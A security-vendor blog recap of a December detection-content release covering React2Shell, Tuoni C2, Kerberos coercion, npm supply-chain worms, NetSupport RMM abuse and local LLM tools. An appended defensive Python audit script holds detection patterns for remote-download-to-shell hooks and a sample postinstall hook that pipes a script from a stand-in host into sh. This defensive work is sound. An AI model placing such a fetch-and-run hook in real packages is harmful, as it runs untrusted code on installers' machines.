Splunk Security Content for Threat Detection & Response: December Recap
In December, the Splunk Threat Research Team had 1 release of new security content via the Enterprise Security Content Update (ESCU) app (v5.19). With this release, there are 6 new analytic stories and 31 new analytics now available in Splunk Enterprise Security via the ESCU application update process.
Content Highlights Include:
This release advances the Splunk + Cisco Better Together strategy with the largest expansion of Cisco ASA security analytics to date, exposing configuration tampering, logging suppression, packet capture abuse, identity manipulation, and reconnaissance activity on firewall infrastructure. Together, these updates help customers detect high-impact threats earlier, reduce blind spots across modern enterprise environments, and strengthen SOC effectiveness through unified, high-confidence detections. In addition, this release also adds the following coverage:
- React2Shell (CVE-2025-55182): Introduced a new analytic story, React2Shell, addressing the critical pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components. This vulnerability affects React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, as well as Next.js 15.x and 16.x versions using the App Router. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, allowing attackers to execute arbitrary JavaScript code on the server without authentication.
- Tuoni C2 Framework: Introduced a new analytic story addressing threats from the Tuoni command-and-control framework, a sophisticated cross-platform red teaming tool increasingly adopted by threat actors for real-world attacks. Tuoni enables adversaries to deploy malicious payloads directly into system memory, bypassing traditional disk-based detection mechanisms. Its modular design supports multiple attack variations and allows operators to maintain persistence and execute commands across Windows, Linux, and macOS environments without leaving significant forensic artifacts.
- Kerberos Coercion with DNS (CVE-2025-33073): A new analytic story addressing CVE-2025-33073. These analytics identify coercion attempts where attackers leverage DNS records to trigger Kerberos authentication from remote hosts, a technique that can lead to credential relay or domain privilege escalation.
- NPM Supply Chain Compromise (Shai-Hulud Campaigns): Expanded detection coverage for npm ecosystem supply chain compromises, addressing both the Shai-Hulud 2.0 worm campaign and recurring lifecycle hook abuse patterns. This update adds analytics to detect malicious npm package installations that execute arbitrary scripts through preinstall, install, postinstall, or prepare hooks, a long-standing risk vector exploited in major incidents from event-stream (2018) to ua-parser-js (2021) and Shai-Hulud (2025).
- NetSupport RMM Tool Abuse: Strengthened detection coverage for malicious use of the NetSupport Manager RMM tool, which adversaries frequently deploy for covert remote access under the guise of legitimate remote-support activity. New analytics identify NetSupport's presence through loaded module patterns, executable masquerading, and registry manipulation, including detections for Windows Deletion of Most Recent Used Command via Registry, Executable Masquerading as Benign File Types, and NetSupport RMM Loaded Modules.
- Suspicious Local LLM Frameworks: Added new analytics to address the rise of Shadow AI, the unauthorized deployment of local Large Language Model (LLM) frameworks such as Ollama, LM Studio, GPT4All, Jan, llama.cpp, and KoboldCPP inside enterprise environments. These tools allow users to run powerful models locally, creating blind spots for data exfiltration, policy violations, and unmonitored processing of sensitive information.
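The npm lifecycle hooks named in the Shai-Hulud item above (preinstall, install, postinstall, prepare) run automatically on `npm install`, which is why a pre-install review of a package manifest is a useful complement to endpoint detections. The following is an added example, not ESCU content or code from Splunk: it scans a package.json for lifecycle hook scripts matching constructed heuristics (remote download piped to a shell, inline node evaluation, base64 content, eval), and the sample manifest and its domain are constructed for illustration.

```python
import json
import re

# npm lifecycle hooks that run automatically during `npm install`
# (the hooks named in the recap above).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics: hook script bodies a defender should review
# before allowing the package into a build pipeline.
SUSPICIOUS_PATTERNS = (
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"), "remote download piped to a shell"),
    (re.compile(r"\bnode\s+(-e|--eval)\b"), "inline node evaluation"),
    (re.compile(r"base64"), "base64-encoded content"),
    (re.compile(r"\beval\s*\("), "eval() call"),
)


def audit_lifecycle_hooks(package_json_text):
    """Return (hook, reason) pairs for each lifecycle hook whose script
    matches a suspicious pattern. An empty list means nothing matched,
    not that the package is safe."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if not isinstance(body, str):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(body):
                findings.append((hook, reason))
    return findings


# Constructed sample manifest: a benign `prepare` build step next to a
# `postinstall` hook that fetches and executes a remote script.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-widget",
    "version": "1.0.0",
    "scripts": {
        "prepare": "tsc -p tsconfig.json",
        "postinstall": "curl -fsSL https://example.invalid/setup.sh | sh",
    },
})

if __name__ == "__main__":
    for hook, reason in audit_lifecycle_hooks(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {reason}")
```

Running the audit over every package.json under node_modules after a lockfile-only install surfaces hooks that would execute in a later full install.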
For all our tools and security content, please visit research.splunk.com.